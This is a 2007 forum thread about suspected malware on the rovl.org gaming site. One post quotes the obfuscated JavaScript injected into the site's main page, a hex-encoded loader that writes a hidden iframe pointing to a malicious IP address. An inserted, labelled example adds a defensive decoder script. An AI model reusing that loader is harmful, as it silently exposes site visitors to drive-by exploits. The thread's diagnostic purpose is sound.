Security Issue - Read Please!

Started by Shadow, August 26, 2007, 06:44:59 PM


Shadow

well I'm pretty careful of my browsing anyways... I'd be very surprised to find anything other than the occasional tracking cookie on my machine
<=holbs-.. ..-holbs=> <=holbs-..

windhound

#16
eh, if you keep your box up to date with a decent antivirus and firewall you're generally fine
but, you don't have to browse to the bad sites to get infected
http://it.slashdot.org/article.pl?sid=04/05/17/0640235  older slashdot article: an unprotected, unpatched windows box on an open network is vulnerable to attacks.
You don't have to go to them, they come to you = P

OneCare got slammed too
http://news.bbc.co.uk/2/hi/technology/6331959.stm
http://news.bbc.co.uk/2/hi/technology/6418965.stm

If you're going to use windows keep it safe, more zombie boxes are bad for all of us.  That's why AVG, Avast, and other antivirus programs offer a free version and ZoneAlarm is a free firewall for home users.
Windows Firewall got pitiful reviews as well, but it's much better than nothing  (SELinux Firewall ftw!)

last note, a hardware router (linksys, dlink, etc) is an excellent first line of defence, if they see somethin' coming in they weren't expecting it generally gets thrown away.  if you open ports or DMZ then that removes said protection, but that's what software firewalls are for

edit, disclaimer
...I'm just typing this 'cause it's the first full week of school and I've got some downtime between classes, just spewing some general info and ideas with the idea that a small percentage of it may be useful to someone = P
A Goldfish has an attention span of 3 seconds...  so do I
~ In the beginning there was nothing, which exploded ~
There are only 10 types of people in the world: Those who understand binary, and those who don't

Shadow

I have a linksys router, and I run online scans from Norton every now and again to cover some of OneCare's holes

it's worked well so far

Gen. Volkov

I've got pretty comprehensive protection myself.. I've never noticed viruses from rovl though.
It is said that when Rincewind dies the occult ability of the entire human race will go up by a fraction. -Terry Pratchett

cloud says: I'm pretty sure I'm immune to everything that I can be immune to...brb snorting anthrax.

Sticker334 says(Peace Alliance): OMG! HOBOES

Shadow

run an online scan or something - "trojandownloader" and "exploit" running around your pc sounds pretty ugly to me

Gen. Volkov

I mean, my McAfee catches those things pretty easily, and I run scans on a weekly basis, I've noticed nothing strange when I log on to the forums or the game. I don't use the rovl portal though.

Shadow

the login page is fine, only rovl causes me problems

bjornredtail

#22
Quote
function v46d4d1ff29476(v46d4d1ff29c45){
    function v46d4d1ff2a414 () {
        return 16;
    }
    return(parseInt(v46d4d1ff29c45,v46d4d1ff2a414()));
}
function v46d4d1ff2b3b9(v46d4d1ff2bb83){
    function v46d4d1ff2d324 () {
        var v46d4d1ff2dac6=2;
        return v46d4d1ff2dac6;
    }
    var v46d4d1ff2c353='';
    for(v46d4d1ff2cb24=0; v46d4d1ff2cb24<v46d4d1ff2bb83.length; v46d4d1ff2cb24+=v46d4d1ff2d324()){
        v46d4d1ff2c353+=(String.fromCharCode(v46d4d1ff29476(v46d4d1ff2bb83.substr(v46d4d1ff2cb24, v46d4d1ff2d324()))));
    }
    return v46d4d1ff2c353;
} document.write(v46d4d1ff2b3b9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D316139633132207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3830343433292B27386432666361373133315C272077696474683D373831206865696768743D313033207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
Just imagine that, just without the whitespace to make it somewhat readable. That funky bit of code appears on the rovl.org main page. I think this is the source of our problems.
0==={=B=J=O=R=N=R=E=D=T=A=I=L==>
AKA, Nevadacow
First person to ever play RWL

"Program testing can be used to show the presence of bugs, but never to show their absence!"-Edsger W. Dijkstra

Visit http://frostnflame.org today!
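
Added example, not part of any post in this thread: the quoted script turns a string of hex pairs into text and hands the result to document.write, so the quickest way to see what such a snippet injects is to decode the string yourself without running the page's code. The sketch below does that for any page source and flags hidden iframes in the result; the sample page, the decoder name d() and the address 192.0.2.10 are constructed for illustration.

```javascript
// Added example: decode the hex argument as text only; nothing is evaluated
// or written to a DOM.
const HEX_LITERAL = /(['"])((?:[0-9a-fA-F]{2}){20,})\1/g; // 40+ hex chars, quoted

function decodeHexPayload(hex) {
  if (hex.length % 2 !== 0 || !/^[0-9a-fA-F]*$/.test(hex)) {
    throw new Error('not an even-length hex string');
  }
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Decode every long hex literal in the page source and report what it hides.
function analyzeSource(source) {
  const findings = [];
  for (const m of source.matchAll(HEX_LITERAL)) {
    const decoded = decodeHexPayload(m[2]);
    const iframes = (decoded.match(/<iframe\b[^>]*>/gi) || []).map((tag) => {
      // Quotes may be backslash-escaped because the markup sits inside a JS string.
      const src = /src\s*=\s*[\\'"]*([^\s'"\\>]+)/i.exec(tag);
      return {
        src: src ? src[1] : null,
        hidden: /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag),
      };
    });
    findings.push({
      decoded,
      iframes,
      writesMarkup: /document\.write\s*\(/i.test(decoded),
    });
  }
  return findings;
}

// Constructed sample (not the payload from the thread); 192.0.2.10 is a
// documentation address and d() is a hypothetical decoder name.
const toHex = (s) =>
  Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('').toUpperCase();
const innerMarkup =
  "<SCRIPT>document.write('<iframe src=\\'http://192.0.2.10/landing.php?id=1\\' " +
  "width=1 height=1 style=\\'display: none\\'></iframe>')</SCRIPT>";
const samplePage =
  "<body><script>document.write(d('" + toHex(innerMarkup) + "'));</script></body>";

console.log(JSON.stringify(analyzeSource(samplePage), null, 2));
```

Run it with Node against saved page source (view source, save to a file, read it in) rather than in the browser that loaded the page.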

Shadow

I have no idea what it means - enlighten me

wolf bite

The ROVL main page does go to some site to get random explanations of the 4 different sites.  Maybe you are picking that up?


Wolf Bite
********************
Grand Master Wolf Bite
********************
Wolf Pack =  Klowd19, Blood Wake, Sonoras, Giggles

windhound

O_o  well would you lookit that

naw wolf, /maybe/ the php script goes around and fetches descriptions, but I doubt it.  it would be wasteful and much easier to just put it in.  anyways, if it was fetching that bit shouldn't be viewable.  go to http://rovl.org and view source (with firefox just right click / view page source), it's a little over halfway down, just after the body tag and it's contained within [script] tags

I haven't any idea what that does, assuming it does anything, but it's almost certainly unnecessary.

bjornredtail

If that were the case, why the seemingly random function names? Why the fancy encoding of the stuff to be printed? Why the complete lack of any formatting or documentation? I believe it is intentionally set up to be confusing, difficult to track down and malicious. Additionally, the random thing I believe is done serverside. The client never sees any of that code.

I'll take a closer look at the code later, using the powers of VIM.

Shadow

retto owns rovl does he not? why would he put malicious code there?

windhound

ever heard the term 'compromised'?
well, this is an example. 
server got itself hack'd

Shadow

#29
aha... well ima put it on restricted sites so I don't forget again? :-P

edit: nvm that blocks forums too ^_^